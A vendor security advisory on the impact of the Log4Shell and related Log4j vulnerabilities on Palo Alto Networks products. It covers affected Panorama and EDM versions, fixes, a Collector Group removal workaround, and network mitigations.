Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832

Apache Log4j Java library is vulnerable to a remote code execution vulnerability CVE-2021-44228, known as Log4Shell, and related vulnerabilities CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. Log4Shell allows remote unauthenticated attackers with the ability to inject text into log messages to execute arbitrary code loaded from malicious servers with the privileges of the process utilizing Log4j.

These products and services are not affected by Log4Shell: Bridgecrew, Cortex Data Lake, Cortex XDR agents, Cortex XSOAR, Cortex Xpanse, Enterprise Data Loss Prevention (DLP), Expedition, the GlobalProtect app, IoT Security, Okyo Garde, PAN-DB Private Cloud, PAN-OS software running on firewalls including VM and CN series, Prisma Access, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), SaaS Security, Traps, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.

We have determined that some configurations of Panorama appliances with PAN-OS 9.0, PAN-OS 9.1, and PAN-OS 10.0 are impacted by CVE-2021-44228 and CVE-2021-45046 through the use of Elasticsearch. Fixes were released on December 20, 2021 to address both vulnerabilities on impacted PAN-OS versions. Panorama appliances are not impacted by CVE-2021-45105 and CVE-2021-44832.

NOTE: PAN-OS 8.1 and PAN-OS 10.1 versions for Panorama are not impacted by these issues. All versions of PAN-OS for firewalls and WildFire appliances are not affected.

These vulnerabilities impact Exact Data Matching (EDM) CLI application versions 1.0 - 2.0 provided by Enterprise Data Loss Prevention (DLP). Enterprise DLP is not affected by these issues.

The Palo Alto Networks Product Security Assurance team has completed evaluation of all products and services for these vulnerabilities. All cloud services with known possible impact have been remediated.

At this time, our guidance and criteria for impacted Panorama appliances remain the same for all related vulnerabilities. The Exact Data Matching (EDM) CLI application should now be upgraded to EDM CLI version 2.1 or later versions.

Work around:
For each Panorama hardware appliance and virtual appliance running in Panorama mode or Log Collector mode, that has also been part of a Collector Group, must be removed from their Collector Group in ‘Panorama > Collector Group > Custom-CG-Name > General’ from the web interface. Once affected appliances are removed from all groups, a Panorama commit and Collector Group push for all affected Collector Groups must be performed. The Collector Groups should not be deleted before performing the Collector Group push for the affected Collector Groups, else the Collector Group push will fail to remove the appliances.

NOTE: When this workaround is applied, logging and reporting features in Panorama will not work. All logs stored on the appliance will be lost once it is removed from the Collector Group.

Finally, all appliances that were part of the Collector Group need to be restarted to stop the use of Elasticsearch. This eliminates the exposure to CVE-2021-44228 and CVE-2021-45046.

You can restart the appliance by visiting ‘Panorama > Operations > Device Operations > Reboot Panorama’ from the web interface or by using the command ‘request restart system’ from the CLI.
Once these steps are completed, you can verify that Elasticsearch has stopped and the appliance’s exposure to CVE-2021-44228 and CVE-2021-45046 has been removed, by running the command ‘show system software status | match elasticsearch’ from the CLI.

Managed PAN-OS firewalls can be configured to forward logs to other servers until Panorama log collection functionality is restored. Alternate Log Forwarding options are detailed here: https://docs.paloaltonetworks.com/pan-os/10-0/pan-os-web-interface-help/objects/objects-log-forwarding.html

Follow the security best practices listed in ‘Protecting Panorama and Log Collector Inbound and Outbound Communications’ to reduce the risk of successful exploitation of CVE-2021-44228 and CVE-2021-45046 on Panorama appliances: https://live.paloaltonetworks.com/t5/general-articles/protecting-panorama-and-log-collector-inbound-and-outbound/ta-p/454071

Additionally, use ACLs to limit network access to Panorama to only trusted users and trusted networks and IP addresses. Use App-ID for ‘ldap’ and ‘rmi-iiop’ to block all LDAP and RMI traffic to and from untrusted networks or unexpected sources.

No other workarounds or mitigations are available for Palo Alto Networks products at this time.